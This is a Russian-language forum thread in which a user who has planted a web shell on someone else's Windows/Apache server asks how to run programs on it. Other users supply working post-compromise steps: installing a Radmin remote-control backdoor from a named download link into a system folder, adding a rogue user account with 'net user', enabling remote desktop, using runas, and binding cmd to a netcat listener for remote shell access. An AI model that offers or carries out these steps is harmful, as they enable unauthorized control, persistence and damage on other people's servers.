- Есть доступ к компу (не локалхост) - Могу загружать (шелл...)/скачивать/удалять с сервера без ограничений - Win NT - Apache Как мне запустить на этом сервере какой-нибудь exe/bat файл? - Не помешает ли то, что тачка залагофена?
залагофена? это что -- микроб новый или болезьн какая----- пифлит правильно сказал закачай шелл и через него
На локалхосте ехешка открывается - там нет. Еще пробовал "start Full_Patch" - у меня пашет - там нет. В чем м/б дело?
Специально для тебя разжевываю 2 вещи: 1. "Залогофена" - Log Off - Пользователь не авторизовался в системе. Не влияет на выполнение программ из веб шелла. 2. Читай внимательно начало темы. Шелл уже залит. Теперь по сабжу. Топикстартер, самый простой вариант, почему у тебя не выполняються комманды системы (в том числе и на исполнение файлов) это так назаваемый Safe Mode режим работы Apache сервера. Прежде чем выполнять exe или bat, попробуй выполнить комманду tasklist. Если оны выполниться, а программы - нет, то дело, скорее всего в дополнительной защите сервера. Впрочем это довольно большая редкость (доп.защита).
PHP version: 5.2.1 Disable functions : NONE Windows NT 5.0 build 2195 При запуске (попытке) ехе или батника - ошибок не пишет и не ошибок тоже - просто начинает выполняться страница (загрузка) и продолжает это в течении 10 минут, потом я насильно перезахожу в шелл.
Ну так и должно быть. Тебе сказали - выполни tasklist и посмотри висит ли твой ехе в процессах. Если нет, то значит фаервол/etc или банально нет прав.
Рассказываю.... Значит так... 1) качаешь http://limpompo.nm.ru/radmin_install.rar 2) Заходишь на свой шелл... Меняешь диру на C:\windows\system32\spool 3) Создаёшь папочку Командой mkdir setup - потом заходишь в неё 4) Разархивируй Архив (Увидишь 4 файла) 5) Заливай по одному на Дедик 6) Запускай install.bat 7) Установи у себя Клиета Radmin 8) Коннектишься к Radmin server-у на порт 5454 9) ВВодишь пароль vasea_123 10) Ура... Можно и пивка выпить....
Спасибо. Радмин уже залит!!! Подскажи только как сделать (6) пункт? Фаера вроде нет. Каких прав нет? Как они ставятся? Как их получить?
Hana Попробуй через твой шелл замутить дополнительного юзверя Code: net user vasia 123 /add ну....если получитя конечно.....потом как создашь юзверя проверь есть ли он или нет Code: net user если в списке есть vasia, то можешь попытаться проконектиться через рдп: у ся на компе: ALT+R => mstsc => server.com если приконектится вводи логин vasia пароль 123 и всё......если получится то ты увидишь рабочий стол сервака! //ЗЫ: немнога поздновато конечно....но ниче.....может другим пригодится =0)
Никогда не поздно =) Юзера добавил, правда не так просто... Привилегии админа. Но через рдп не лезет - пишет, что не удается подключиться... Это значит сервис выключен или можно еще что-то попробовать (логин и пасс точно правильные)?
И заодно: как включается этот самый удаленный рабочий стол? Желательно чтобы слова можно было переделать в автоматизм (прогу напишу сам). Вопрос не для данного случая, но тоже нужен
попробуй стартануть сервис Code: net start REMOTEACCESS ...(на счёт названия сервиса я неуверен)если фаер будет блокировать, то придется работать с радмином или виэнси, пуск файлов типа exe/bat/cmd придется выполнять через команду runas такова типа Code: echo (твой_пароль) | runas /env /noprofile /user:(твой_юзер) install.exe
Не могу даже у себя на компе - пишет что сервис выключен. Фаера там походу нет, но запустить что-либо связанное с нэтом не получатся: Написал консольку типа РанАс. Она запускается через шелл, и выдает мой текст "Все ок". Т.е. вроде должно запустится приложение. Написал еще одну прогу: при запуске конектиться на мой комп и через 5 сек выходит. Запускал и с своим РанАсом, и просто "напрямую" из шелла: ко мне никто так и не приконнектился. Этим же РанАсом удалил несколько папок (самопальных), которые не мог удалить чрез шелл командой rmdir (т.е. проги я могу запускать, но в нэт их кто-то не пускает). Думал проблема с ИПишкой сервака - но скорее всего ошибся, так как ко мне, повторюсь, этот самый сервак не приконнектился (у меня ИП норм). Что еще можно попробовать? Немного запортил сервак. 1) что я мог сделать, что теперь апачь в логах пишет только один ИП: 0.0.0.0? 2) если я перезагружу комп - апачь стартанется без ЛогИна? 3) при "прямых запусках" программ черех шелл, шеллы виснут, т.е. немогу зайти повторно и удалить их с сервака. Так должно быть или...?
чем ты конектился к себе? покажи сорс проги.... фаер не обязательно должен стоять именно на этой машине, он может быть и на другой через которую проходит весь трафик, а может там и рутер стоит .....выведи команду Code: netstat -ano просмотри какие порты прослушиваются, залей нэткэт и повесь консоль в бэкграунд Code: nc.exe или netcat.exe -l -p ( прослушивающийся порт ) -d -e cmd а потом через putty от себя в моде RAW или RLOGIN ( точно не помню ) конэктся на указанный тобою порт и воаля....консоль сервака у тебя в руках 1) даже понятия не имей 2) по идее должен без логина ( автоматичесkи ) - это же сервис 3) если прога требует пароль из консоли то это логично, а может ещё из за графического интерфэйса oO //PS: "ДУ стол" - эта чё?
Hana, если есть доступ к командной строке, заходишь в папку с файлом (с помощью комманд cd =)) и просто пишешь start file.bat или start file.exe должно работать